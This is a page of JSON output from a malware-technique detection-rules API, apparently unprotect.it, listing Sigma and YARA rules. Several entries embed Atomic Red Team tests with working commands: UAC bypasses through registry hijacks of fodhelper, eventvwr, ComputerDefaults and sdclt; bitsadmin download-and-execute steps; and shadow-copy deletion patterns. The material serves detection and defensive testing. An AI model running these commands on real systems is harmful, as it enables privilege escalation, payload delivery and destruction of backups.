GET /api/detection_rules/?page=2
HTTP 200 OK
Allow: GET, POST, HEAD, OPTIONS
Content-Type: application/json
Vary: Accept

{
    "count": 115,
    "next": "https://unprotect.it/api/detection_rules/?page=3",
    "previous": "https://unprotect.it/api/detection_rules/",
    "results": [
        {
            "id": 55,
            "key": "sigma_bypass_applocker",
            "type": {
                "id": 3,
                "name": "SIGMA",
                "syntax_lang": "yaml"
            },
            "name": "SIGMA_bypass_applocker",
            "rule": "title: AppLocker Bypass via Regsvr32\r\nstatus: experimental\r\ndescription: AppLocker Bypass via Regsvr32\r\nauthor: Joe Security\r\ndate: 2020-03-04\r\nid: 200059\r\nthreatname:\r\nbehaviorgroup: 5\r\nclassification: 8\r\nmitreattack:\r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:      \r\n          CommandLine:\r\n              - '*regsvr32*/s /u /n /i:http*scrobj*'\r\n      condition: selection\r\nlevel: critical"
        },
        {
            "id": 9,
            "key": "sigma_check_external_ip",
            "type": {
                "id": 3,
                "name": "SIGMA",
                "syntax_lang": "yaml"
            },
            "name": "SIGMA_check_external_ip",
            "rule": "title: Check external IP via Powershell\r\nstatus: experimental\r\ndescription: Check external IP via Powershell\r\nauthor: Joe Security\r\ndate: 2020-07-20\r\nid: 200081\r\nthreatname:\r\nbehaviorgroup: 8\r\nclassification: 6\r\nmitreattack:\r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:      \r\n          CommandLine:\r\n              - '*powershell*api.ipify.org*'\r\n      condition: selection\r\nlevel: critical"
        },
        {
            "id": 43,
            "key": "sigma_decode_string_findstr",
            "type": {
                "id": 3,
                "name": "SIGMA",
                "syntax_lang": "yaml"
            },
            "name": "SIGMA_decode_string_findstr",
            "rule": "title: Decode strings from lnk via findstr.exe\r\nstatus: experimental\r\ndescription: uses findstr.exe to decode strings from lnk file\r\nauthor: Joe Security\r\ndate: 2019-11-11\r\nid: 200024\r\nthreatname:\r\nbehaviorgroup: 1\r\nclassification: 8\r\nmitreattack: \r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:      \r\n          CommandLine:\r\n              - '*findstr /b /i *.lnk*'\r\n      condition: selection\r\nlevel: critical"
        },
        {
            "id": 33,
            "key": "sigma_delete_shadow_copy",
            "type": {
                "id": 3,
                "name": "SIGMA",
                "syntax_lang": "yaml"
            },
            "name": "SIGMA_delete_shadow_copy",
            "rule": "title: Delete Shadow Copy Via Powershell\r\nstatus: experimental\r\ndescription: Delete Shadow Copy Via Powershell\r\nauthor: Joe Security\r\ndate: 2019-10-25\r\nid: 200011\r\nthreatname:\r\nbehaviorgroup: 18\r\nclassification: 8\r\nmitreattack: T1490\r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:      \r\n          CommandLine:\r\n              - '*powershell*RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==*'\r\n      condition: selection\r\nlevel: critical"
        },
        {
            "id": 54,
            "key": "sigma_detect_region",
            "type": {
                "id": 3,
                "name": "SIGMA",
                "syntax_lang": "yaml"
            },
            "name": "SIGMA_detect_region",
            "rule": "title: Geofenced Ru\r\nstatus: experimental\r\ndescription: Detect region and exit if matched with harcoded country list Get-UICulture).Name -match \"CN|RO|RU|UA|BY \r\nauthor: Joe Security\r\ndate: 2019-11-06\r\nid: 200019\r\nthreatname:\r\nbehaviorgroup: 8\r\nclassification: 8\r\nmitreattack: T1241\r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:      \r\n          CommandLine:\r\n              - '*R2V0LVVJQ3VsdHVyZSkuTmFtZSAtbWF0Y2ggIkNOfFJPfFJVfFVBfEJZI*'\r\n      condition: selection\r\nlevel: critical"
        },
        {
            "id": 51,
            "key": "sigma_hide_copy_melt",
            "type": {
                "id": 3,
                "name": "SIGMA",
                "syntax_lang": "yaml"
            },
            "name": "SIGMA_hide_copy_melt",
            "rule": "title: Hide copy and delete itself\r\nstatus: experimental\r\ndescription: Hide copy via attrib.exe and delete itself\r\nauthor: Joe Security\r\ndate: 2019-11-12\r\nid: 200025\r\nthreatname:\r\nbehaviorgroup: 1\r\nclassification: 8\r\nmitreattack: \r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:      \r\n          CommandLine:\r\n              - '*attrib +s +h *timeout /t *del /f /q*'\r\n      condition: selection\r\nlevel: critical"
        },
        {
            "id": 59,
            "key": "sigma_hide_in_appdata",
            "type": {
                "id": 3,
                "name": "SIGMA",
                "syntax_lang": "yaml"
            },
            "name": "SIGMA_hide_in_appdata",
            "rule": "title: Copy itself to suspicious location via type command \r\nstatus: experimental\r\ndescription: Copy itself to suspicious location via type command\r\nauthor: Joe Security\r\ndate: 2020-02-13\r\nid: 200052\r\nthreatname:\r\nbehaviorgroup: 10\r\nclassification: 1\r\nmitreattack:\r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:      \r\n          CommandLine:\r\n              - '*cmd*type*>*\\AppData*'\r\n      condition: selection\r\nlevel: critical"
        },
        {
            "id": 36,
            "key": "sigma_kill_process",
            "type": {
                "id": 3,
                "name": "SIGMA",
                "syntax_lang": "yaml"
            },
            "name": "SIGMA_kill_process",
            "rule": "title: Kill multiple process\r\nstatus: experimental\r\ndescription: Kill multiple process\r\nauthor: Joe Security\r\ndate: 2019-12-30\r\nid: 200039\r\nthreatname:\r\nbehaviorgroup: 18\r\nclassification: 8\r\nmitreattack:\r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:      \r\n          CommandLine:\r\n              - '*cmd*taskkill /f*& taskkill /f*& taskkill /f*& taskkill /f*& taskkill /f*& taskkill /f*& taskkill /f*'\r\n      condition: selection\r\nlevel: critical"
        },
        {
            "id": 29,
            "key": "sigma_lolbins",
            "type": {
                "id": 3,
                "name": "SIGMA",
                "syntax_lang": "yaml"
            },
            "name": "SIGMA_lolbins",
            "rule": "attack_technique: T1197\r\ndisplay_name: BITS Jobs\r\natomic_tests:\r\n- name: Bitsadmin Download (cmd)\r\n  auto_generated_guid: 3c73d728-75fb-4180-a12f-6712864d7421\r\n  description: |\r\n    This test simulates an adversary leveraging bitsadmin.exe to download\r\n    and execute a payload\r\n  supported_platforms:\r\n  - windows\r\n  input_arguments:\r\n    remote_file:\r\n      description: Remote file to download\r\n      type: url\r\n      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md\r\n    local_file:\r\n      description: Local file path to save downloaded file\r\n      type: path\r\n      default: '%temp%\\bitsadmin1_flag.ps1'\r\n  executor:\r\n    command: |\r\n      bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} #{local_file}\r\n    cleanup_command: |\r\n      del #{local_file} >nul 2>&1\r\n    name: command_prompt\r\n- name: Bitsadmin Download (PowerShell)\r\n  auto_generated_guid: f63b8bc4-07e5-4112-acba-56f646f3f0bc\r\n  description: |\r\n    This test simulates an adversary leveraging bitsadmin.exe to download\r\n    and execute a payload leveraging PowerShell\r\n\r\n    Upon execution you will find a github markdown file downloaded to the Temp directory\r\n  supported_platforms:\r\n  - windows\r\n  input_arguments:\r\n    remote_file:\r\n      description: Remote file to download\r\n      type: url\r\n      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md\r\n    local_file:\r\n      description: Local file path to save downloaded file\r\n      type: path\r\n      default: $env:TEMP\\bitsadmin2_flag.ps1\r\n  executor:\r\n    command: |\r\n      Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination #{local_file}\r\n    cleanup_command: |\r\n      Remove-Item #{local_file} -ErrorAction Ignore\r\n    name: powershell\r\n- name: Persist, Download, & Execute\r\n  auto_generated_guid: 62a06ec5-5754-47d2-bcfc-123d8314c6ae\r\n  description: |\r\n    This test simulates an adversary leveraging bitsadmin.exe to schedule a BITS transferand execute a payload in multiple steps.\r\n    Note that in this test, the file executed is not the one downloaded. The downloading of a random file is simply the trigger for getting bitsdamin to run an executable.\r\n    This has the interesting side effect of causing the executable (e.g. notepad) to run with an Initiating Process of \"svchost.exe\" and an Initiating Process Command Line of \"svchost.exe -k netsvcs -p -s BITS\"\r\n    This job will remain in the BITS queue until complete or for up to 90 days by default if not removed.\r\n  supported_platforms:\r\n  - windows\r\n  input_arguments:\r\n    command_path:\r\n      description: Path of command to execute\r\n      type: path\r\n      default: C:\\Windows\\system32\\notepad.exe\r\n    bits_job_name:\r\n      description: Name of BITS job\r\n      type: string\r\n      default: AtomicBITS\r\n    local_file:\r\n      description: Local file path to save downloaded file\r\n      type: path\r\n      default: '%temp%\\bitsadmin3_flag.ps1'\r\n    remote_file:\r\n      description: Remote file to download\r\n      type: url\r\n      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md\r\n  executor:\r\n    command: |\r\n      bitsadmin.exe /create #{bits_job_name}\r\n      bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file}\r\n      bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} \"\"\r\n      bitsadmin.exe /resume #{bits_job_name}\r\n      timeout 5\r\n      bitsadmin.exe /complete #{bits_job_name}\r\n    cleanup_command: |\r\n      del #{local_file} >nul 2>&1\r\n    name: command_prompt\r\n- name: Bits download using destktopimgdownldr.exe (cmd)\r\n  auto_generated_guid: afb5e09e-e385-4dee-9a94-6ee60979d114\r\n  description: |\r\n    This test simulates using destopimgdwnldr.exe to download a malicious file\r\n    instead of a desktop or lockscreen background img. The process that actually makes \r\n    the TCP connection and creates the file on the disk is a svchost process (“-k netsvc -p -s BITS”) \r\n    and not desktopimgdownldr.exe. See https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/\r\n  supported_platforms:\r\n  - windows\r\n  input_arguments:\r\n    remote_file:\r\n      description: Remote file to download\r\n      type: url\r\n      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md\r\n    download_path:\r\n      description: Local file path to save downloaded file\r\n      type: path\r\n      default: 'SYSTEMROOT=C:\\Windows\\Temp'\r\n    cleanup_path:\r\n      description: path to delete file as part of cleanup_command\r\n      type: path\r\n      default: C:\\Windows\\Temp\\Personalization\\LockScreenImage\r\n    cleanup_file:\r\n      description: file to remove as part of cleanup_command\r\n      type: string\r\n      default: \"*.md\"\r\n  executor:\r\n    command: |\r\n      set \"#{download_path}\" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file} /eventName:desktopimgdownldr\r\n    cleanup_command: |\r\n      del #{cleanup_path}\\#{cleanup_file} >null 2>&1\r\n    name: command_prompt"
        },
        {
            "id": 44,
            "key": "sigma_onset_delay",
            "type": {
                "id": 3,
                "name": "SIGMA",
                "syntax_lang": "yaml"
            },
            "name": "SIGMA_onset_delay",
            "rule": "title: Powershell delayed execution via ping command\r\nstatus: experimental\r\ndescription: Powershell delayed execution via ping command\r\nauthor: Joe Security\r\ndate: 2020-03-17\r\nid: 200066\r\nthreatname:\r\nbehaviorgroup: 5\r\nclassification: 8\r\nmitreattack:\r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:      \r\n          CommandLine:\r\n              - '*ping -n * & powershell.exe -executionpolicy bypass -noninteractive -windowstyle hidden*'\r\n      condition: selection\r\nlevel: critical"
        },
        {
            "id": 34,
            "key": "sigma_posh_pc_delete_volume_shadow_copies",
            "type": {
                "id": 3,
                "name": "SIGMA",
                "syntax_lang": "yaml"
            },
            "name": "SIGMA_posh_pc_delete_volume_shadow_copies",
            "rule": "title: Delete Volume Shadow Copies Via WMI With PowerShell\r\nid: 87df9ee1-5416-453a-8a08-e8d4a51e9ce1\r\ndescription: Shadow Copies deletion using operating systems utilities via PowerShell\r\nreferences:\r\n    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md\r\n    - https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_shadow_copies_deletion.yml\r\n    - https://www.fortinet.com/blog/threat-research/stomping-shadow-copies-a-second-look-into-deletion-methods\r\ntags:\r\n    - attack.impact\r\n    - attack.t1490\r\nstatus: experimental\r\nauthor: frack113\r\ndate: 2021/06/03\r\nmodified: 2021/10/16\r\nlogsource:\r\n    product: windows\r\n    category: ps_classic_start\r\n    definition: fields have to be extract from event\r\ndetection:\r\n    selection_obj:\r\n        HostApplication|contains|all:\r\n            - 'Get-WmiObject'\r\n            - ' Win32_Shadowcopy'\r\n    selection_del:\r\n        HostApplication|contains:\r\n            - 'Delete()'\r\n            - 'Remove-WmiObject'\r\n    condition: selection_obj and selection_del\r\nfields:\r\n    - HostApplication\r\nfalsepositives:\r\n    - Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason\r\nlevel: critical"
        },
        {
            "id": 37,
            "key": "sigma_proc_creation_win_shadow_copies_deletion",
            "type": {
                "id": 3,
                "name": "SIGMA",
                "syntax_lang": "yaml"
            },
            "name": "SIGMA_proc_creation_win_shadow_copies_deletion",
            "rule": "title: Shadow Copies Deletion Using Operating Systems Utilities\r\nid: c947b146-0abc-4c87-9c64-b17e9d7274a2\r\nstatus: stable\r\ndescription: Shadow Copies deletion using operating systems utilities\r\nauthor: Florian Roth, Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)\r\ndate: 2019/10/22\r\nmodified: 2021/10/24\r\nreferences:\r\n    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment\r\n    - https://blog.talosintelligence.com/2017/05/wannacry.html\r\n    - https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/\r\n    - https://www.bleepingcomputer.com/news/security/why-everyone-should-disable-vssadmin-exe-now/\r\n    - https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100\r\n    - https://github.com/Neo23x0/Raccine#the-process\r\n    - https://github.com/Neo23x0/Raccine/blob/main/yara/gen_ransomware_command_lines.yar\r\n    - https://redcanary.com/blog/intelligence-insights-october-2021/\r\ntags:\r\n    - attack.defense_evasion\r\n    - attack.impact\r\n    - attack.t1070\r\n    - attack.t1490\r\nlogsource:\r\n    category: process_creation\r\n    product: windows\r\ndetection:\r\n    selection1:\r\n        Image|endswith:\r\n            - '\\powershell.exe'\r\n            - '\\wmic.exe'\r\n            - '\\vssadmin.exe'\r\n            - '\\diskshadow.exe'\r\n        CommandLine|contains|all:\r\n            - shadow  # will match \"delete shadows\" and \"shadowcopy delete\" and \"shadowstorage\"\r\n            - delete\r\n    selection2:\r\n        Image|endswith:\r\n            - '\\wbadmin.exe'\r\n        CommandLine|contains|all:\r\n            - delete\r\n            - catalog\r\n            - quiet # will match -quiet or /quiet\r\n    selection3:\r\n        Image|endswith: '\\vssadmin.exe'\r\n        CommandLine|contains|all:\r\n            - resize\r\n            - shadowstorage\r\n            - unbounded\r\n    condition: 1 of selection*\r\nfields:\r\n    - CommandLine\r\n    - ParentCommandLine\r\nfalsepositives:\r\n    - Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason\r\nlevel: critical"
        },
        {
            "id": 40,
            "key": "sigma_process_reimaging",
            "type": {
                "id": 3,
                "name": "SIGMA",
                "syntax_lang": "yaml"
            },
            "name": "SIGMA_process_reimaging",
            "rule": "action: global\r\ntitle: Defense evasion via process reimaging\r\nid: 7fa4f550-850e-4117-b543-428c86ebb849\r\ndescription: Detects process reimaging defense evasion technique\r\nstatus: experimental\r\nauthor: Alexey Balandin, oscd.community\r\nreferences:\r\n    - https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/in-ntdll-i-trust-process-reimaging-and-endpoint-security-solution-bypass/\r\ntags:\r\n    - attack.defense_evasion\r\ndate: 2019/10/25\r\ndetection:\r\n    condition: all of them\r\nfalsepositives:\r\n    - unknown\r\nlevel: high\r\n---\r\nlogsource:\r\n    product: windows\r\n    service: sysmon\r\ndetection:\r\n    selection1:\r\n        category: process_creation\r\nfields:\r\n    - Image\r\n    - OriginalFileName\r\n    - ParentProcessGuid\r\nnew_fields:\r\n    - ImageFileName\r\n---\r\nlogsource:\r\n    product: windows\r\n    service: sysmon\r\ndetection:\r\n    selection2:\r\n        EventID: 11\r\nfields:\r\n    - ProcessGuid\r\n    - TargetFilename"
        },
        {
            "id": 48,
            "key": "sigma_spoofed_extension",
            "type": {
                "id": 3,
                "name": "SIGMA",
                "syntax_lang": "yaml"
            },
            "name": "SIGMA_spoofed_extension",
            "rule": "title: Execute DLL with spoofed extension\r\nstatus: experimental\r\ndescription: Execute DLL with spoofed extension\r\nauthor: Joe Security\r\ndate: 2020-03-24\r\nid: 200068\r\nthreatname:\r\nbehaviorgroup: 1\r\nclassification: 8\r\nmitreattack:\r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:      \r\n          CommandLine:\r\n              - '*rundll32*.html,DllRegisterServer*'\r\n              - '*rundll32*.htm,DllRegisterServer*'\r\n              - '*rundll32*.txt,DllRegisterServer*'\r\n              - '*rundll32*.png,DllRegisterServer*'\r\n              - '*rundll32*.jpeg,DllRegisterServer*'\r\n              - '*rundll32*.jpg,DllRegisterServer*'\r\n              - '*regsvr32 c:\\programdata\\\\*.pdf*'\r\n              - '*regsvr32 c:\\programdata\\\\*.txt*'\r\n              - '*regsvr32 c:\\users\\public\\\\*.pdf*'\r\n              - '*regsvr32 c:\\users\\public\\\\*.txt*'\r\n              \r\n      condition: selection\r\nlevel: critical"
        },
        {
            "id": 23,
            "key": "sigma_stop_service",
            "type": {
                "id": 3,
                "name": "SIGMA",
                "syntax_lang": "yaml"
            },
            "name": "SIGMA_stop_service",
            "rule": "title: Stop multiple services\r\nstatus: experimental\r\ndescription: Stop multiple services\r\nauthor: Joe Security\r\ndate: 2019-12-30\r\nid: 200040\r\nthreatname:\r\nbehaviorgroup: 18\r\nclassification: 8\r\nmitreattack:\r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:      \r\n          CommandLine:\r\n              - '*cmd*net stop*& net stop*& net stop*& net stop*& net stop*& net stop*& net stop*'\r\n      condition: selection\r\nlevel: critical"
        },
        {
            "id": 24,
            "key": "sigma_uac_bypass",
            "type": {
                "id": 3,
                "name": "SIGMA",
                "syntax_lang": "yaml"
            },
            "name": "SIGMA_uac_bypass",
            "rule": "title: Fodhelper UAC Bypass\r\nstatus: experimental\r\ndescription: Fodhelper UAC Bypass\r\nauthor: Joe Security\r\ndate: 2020-07-30\r\nid: 200082\r\nthreatname:\r\nbehaviorgroup: 26\r\nclassification: 7\r\nmitreattack:\r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:      \r\n          CommandLine:\r\n              - '*reg add*hkcu\\software\\classes\\ms-settings\\shell\\open\\command*'\r\n      condition: selection\r\nlevel: critical\r\nattack_technique: T1548.002\r\ndisplay_name: 'Abuse Elevation Control Mechanism: Bypass User Access Control'\r\natomic_tests:\r\n- name: Bypass UAC using Event Viewer (cmd)\r\n  auto_generated_guid: 5073adf8-9a50-4bd9-b298-a9bd2ead8af9\r\n  description: |\r\n    Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/\r\n    Upon execution command prompt should be launched with administrative privelages\r\n  supported_platforms:\r\n  - windows\r\n  input_arguments:\r\n    executable_binary:\r\n      description: Binary to execute with UAC Bypass\r\n      type: path\r\n      default: C:\\Windows\\System32\\cmd.exe\r\n  executor:\r\n    command: |\r\n      reg.exe add hkcu\\software\\classes\\mscfile\\shell\\open\\command /ve /d \"#{executable_binary}\" /f\r\n      cmd.exe /c eventvwr.msc\r\n    cleanup_command: |\r\n      reg.exe delete hkcu\\software\\classes\\mscfile /f >nul 2>&1\r\n    name: command_prompt\r\n- name: Bypass UAC using Event Viewer (PowerShell)\r\n  auto_generated_guid: a6ce9acf-842a-4af6-8f79-539be7608e2b\r\n  description: |\r\n    PowerShell code to bypass User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/\r\n    Upon execution command prompt should be launched with administrative privelages\r\n  supported_platforms:\r\n  - windows\r\n  input_arguments:\r\n    executable_binary:\r\n      description: Binary to execute with UAC Bypass\r\n      type: path\r\n      default: C:\\Windows\\System32\\cmd.exe\r\n  executor:\r\n    command: |\r\n      New-Item \"HKCU:\\software\\classes\\mscfile\\shell\\open\\command\" -Force\r\n      Set-ItemProperty \"HKCU:\\software\\classes\\mscfile\\shell\\open\\command\" -Name \"(default)\" -Value \"#{executable_binary}\" -Force\r\n      Start-Process \"C:\\Windows\\System32\\eventvwr.msc\"\r\n    cleanup_command: |\r\n      Remove-Item \"HKCU:\\software\\classes\\mscfile\" -force -Recurse -ErrorAction Ignore\r\n    name: powershell\r\n- name: Bypass UAC using Fodhelper\r\n  auto_generated_guid: 58f641ea-12e3-499a-b684-44dee46bd182\r\n  description: |\r\n    Bypasses User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10.\r\n    Upon execution, \"The operation completed successfully.\" will be shown twice and command prompt will be opened.\r\n  supported_platforms:\r\n  - windows\r\n  input_arguments:\r\n    executable_binary:\r\n      description: Binary to execute with UAC Bypass\r\n      type: path\r\n      default: C:\\Windows\\System32\\cmd.exe\r\n  executor:\r\n    command: |\r\n      reg.exe add hkcu\\software\\classes\\ms-settings\\shell\\open\\command /ve /d \"#{executable_binary}\" /f\r\n      reg.exe add hkcu\\software\\classes\\ms-settings\\shell\\open\\command /v \"DelegateExecute\" /f\r\n      fodhelper.exe\r\n    cleanup_command: |\r\n      reg.exe delete hkcu\\software\\classes\\ms-settings /f >nul 2>&1\r\n    name: command_prompt\r\n- name: Bypass UAC using Fodhelper - PowerShell\r\n  auto_generated_guid: 3f627297-6c38-4e7d-a278-fc2563eaaeaa\r\n  description: |\r\n    PowerShell code to bypass User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10.\r\n    Upon execution command prompt will be opened.\r\n  supported_platforms:\r\n  - windows\r\n  input_arguments:\r\n    executable_binary:\r\n      description: Binary to execute with UAC Bypass\r\n      type: path\r\n      default: C:\\Windows\\System32\\cmd.exe\r\n  executor:\r\n    command: |\r\n      New-Item \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Force\r\n      New-ItemProperty \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Name \"DelegateExecute\" -Value \"\" -Force\r\n      Set-ItemProperty \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Name \"(default)\" -Value \"#{executable_binary}\" -Force\r\n      Start-Process \"C:\\Windows\\System32\\fodhelper.exe\"\r\n    cleanup_command: |\r\n      Remove-Item \"HKCU:\\software\\classes\\ms-settings\" -force -Recurse -ErrorAction Ignore\r\n    name: powershell\r\n- name: Bypass UAC using ComputerDefaults (PowerShell)\r\n  auto_generated_guid: 3c51abf2-44bf-42d8-9111-dc96ff66750f\r\n  description: |\r\n    PowerShell code to bypass User Account Control using ComputerDefaults.exe on Windows 10\r\n    Upon execution administrative command prompt should open\r\n  supported_platforms:\r\n  - windows\r\n  input_arguments:\r\n    executable_binary:\r\n      description: Binary to execute with UAC Bypass\r\n      type: path\r\n      default: C:\\Windows\\System32\\cmd.exe\r\n  executor:\r\n    command: |\r\n      New-Item \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Force\r\n      New-ItemProperty \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Name \"DelegateExecute\" -Value \"\" -Force\r\n      Set-ItemProperty \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Name \"(default)\" -Value \"#{executable_binary}\" -Force\r\n      Start-Process \"C:\\Windows\\System32\\ComputerDefaults.exe\"\r\n    cleanup_command: |\r\n      Remove-Item \"HKCU:\\software\\classes\\ms-settings\" -force -Recurse -ErrorAction Ignore\r\n    name: powershell\r\n    elevation_required: true\r\n- name: Bypass UAC by Mocking Trusted Directories\r\n  auto_generated_guid: f7a35090-6f7f-4f64-bb47-d657bf5b10c1\r\n  description: |\r\n    Creates a fake \"trusted directory\" and copies a binary to bypass UAC. The UAC bypass may not work on fully patched systems\r\n    Upon execution the directory structure should exist if the system is patched, if unpatched Microsoft Management Console should launch\r\n  supported_platforms:\r\n  - windows\r\n  input_arguments:\r\n    executable_binary:\r\n      description: Binary to execute with UAC Bypass\r\n      type: path\r\n      default: C:\\Windows\\System32\\cmd.exe\r\n  executor:\r\n    command: |\r\n      mkdir \"\\\\?\\C:\\Windows \\System32\\\"\r\n      copy \"#{executable_binary}\" \"\\\\?\\C:\\Windows \\System32\\mmc.exe\"\r\n      mklink c:\\testbypass.exe \"\\\\?\\C:\\Windows \\System32\\mmc.exe\"\r\n    cleanup_command: |\r\n      rd \"\\\\?\\C:\\Windows \\\" /S /Q >nul 2>nul\r\n      del \"c:\\testbypass.exe\" >nul 2>nul\r\n    name: command_prompt\r\n    elevation_required: true\r\n- name: Bypass UAC using sdclt DelegateExecute\r\n  auto_generated_guid: 3be891eb-4608-4173-87e8-78b494c029b7\r\n  description: |\r\n    Bypasses User Account Control using a fileless method, registry only. \r\n    Upon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe\r\n    [Reference - sevagas.com](http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass)\r\n    Adapted from [MITRE ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_bypassUAC.ps1)\r\n  supported_platforms:\r\n  - windows\r\n  input_arguments:\r\n    command.to.execute:\r\n      description: Command to execute\r\n      type: string\r\n      default: cmd.exe /c notepad.exe\r\n  executor:\r\n    command: |\r\n      New-Item -Force -Path \"HKCU:\\Software\\Classes\\Folder\\shell\\open\\command\" -Value '#{command.to.execute}'\r\n      New-ItemProperty -Force -Path \"HKCU:\\Software\\Classes\\Folder\\shell\\open\\command\" -Name \"DelegateExecute\"\r\n      Start-Process -FilePath $env:windir\\system32\\sdclt.exe\r\n      Start-Sleep -s 3\r\n    cleanup_command: |\r\n      Remove-Item -Path \"HKCU:\\Software\\Classes\\Folder\" -Recurse -Force -ErrorAction Ignore\r\n    name: powershell"
        },
        {
            "id": 2,
            "key": "yara_check_installed_software",
            "type": {
                "id": 1,
                "name": "YARA",
                "syntax_lang": "YARA"
            },
            "name": "YARA_Check_installed_software",
            "rule": "import \"pe\"\r\n\r\nrule check_installed_software {\r\n    meta:\r\n        description = \"Detect check installed software through registry\"\r\n        author = \"Thomas Roccia | @fr0gger_\"\r\n    strings:\r\n        $s1 = \"SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\" wide\r\n\r\n    condition:\r\n       uint16(0) == 0x5A4D and $s1 or\r\n       pe.imports(\"Advapi32.dll\", \"RegQueryValueEx\")\r\n}"
        },
        {
            "id": 4,
            "key": "yara_debuggercheck_globalflags",
            "type": {
                "id": 1,
                "name": "YARA",
                "syntax_lang": "YARA"
            },
            "name": "YARA_DebuggerCheck_GlobalFlags",
            "rule": "rule DebuggerCheck__GlobalFlags  {\r\n    meta:\r\n\tdescription = \"Rule to detect NtGlobalFlags debugger check\"\r\n        author = \"Thibault Seret\"\r\n        date = \"2020-09-26\"\r\n    strings:\r\n        $s1 = \"NtGlobalFlags\"\r\n    condition:\r\n        any of them\r\n}"
        },
        {
            "id": 6,
            "key": "yara_debuggercheck__remoteapi",
            "type": {
                "id": 1,
                "name": "YARA",
                "syntax_lang": "YARA"
            },
            "name": "YARA_DebuggerCheck__RemoteAPI",
            "rule": "rule DebuggerCheck__RemoteAPI {\r\n    meta:\r\n        description = \"Rule to RemoteAPI debugger check\"\r\n        author = \"Thibault Seret\"\r\n        date = \"2020-09-26\"\r\n    strings:\r\n        $s1 =\"CheckRemoteDebuggerPresent\"\r\n    condition:\r\n        any of them"
        },
        {
            "id": 8,
            "key": "yara_detect_antivmwithtemperature",
            "type": {
                "id": 1,
                "name": "YARA",
                "syntax_lang": "YARA"
            },
            "name": "YARA_Detect_AntiVMWithTemperature",
            "rule": "rule Detect_AntiVMWithTemperature {\r\n    meta:\r\n        description = \"Rue to detect AntiVMwithTemperature technique\"\r\n        author = \"Thibault Seret\"\r\n        date = \"2020-09-26\"\r\n    strings:\r\n        $s1 = {72 6f 6f 74 5c 57 4d 49}\r\n        // root\\WMI\r\n        $s2 = {53 45 4c 45 43 54 20 2a 20 46 52 4f 4d 20 4d 53 41 63 70 69 5f 54 68 65 72 6d 61 6c 5a 6f 6e 65 54 65 6d 70 65 72 61 74 75 72 65}\r\n        // SELECT * FROM MSAcpi_ThermalZoneTemperature\r\n        $s3 = {43 75 72 72 65 6e 74 54 65 6d 70 65 72 61 74 75 72 65}\r\n        //  CurrentTemperature\r\n    \r\n    condition:\r\n    all of them"
        },
        {
            "id": 109,
            "key": "yara_detect_aspack",
            "type": {
                "id": 1,
                "name": "YARA",
                "syntax_lang": "YARA"
            },
            "name": "YARA_Detect_Aspack",
